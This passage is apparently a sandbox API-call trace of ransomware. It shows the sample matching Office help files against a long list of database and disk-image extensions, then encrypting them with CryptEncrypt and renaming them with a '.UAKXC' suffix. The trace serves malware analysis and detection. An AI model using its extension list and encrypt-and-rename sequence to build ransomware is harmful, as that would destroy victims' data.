(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.185] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.186] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.187] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.188] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.189] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.189] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.189] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.190] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.191] SetEndOfFile (hFile=0x6cc) returned 1 [0141.191] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.191] ReadFile (in: hFile=0x6cc, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x152, lpOverlapped=0x0) returned 1 [0141.191] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.191] WriteFile (in: hFile=0x6cc, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x152, lpOverlapped=0x0) returned 1 [0141.191] CloseHandle (hObject=0x6cc) returned 1 [0141.198] GetProcessHeap () returned 0xea0000 [0141.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.198] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" [0141.198] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.UAKXC" [0141.198] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.uakxc")) returned 1 [0141.199] GetProcessHeap () returned 0xea0000 [0141.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee78 | out: hHeap=0xea0000) returned 1 [0141.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0141.199] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0141.199] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0141.199] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0141.200] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn")) returned 0x2022 [0141.305] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0141.305] GetLastError () returned 0x0 [0141.305] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=326) returned 1 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.306] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.307] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", 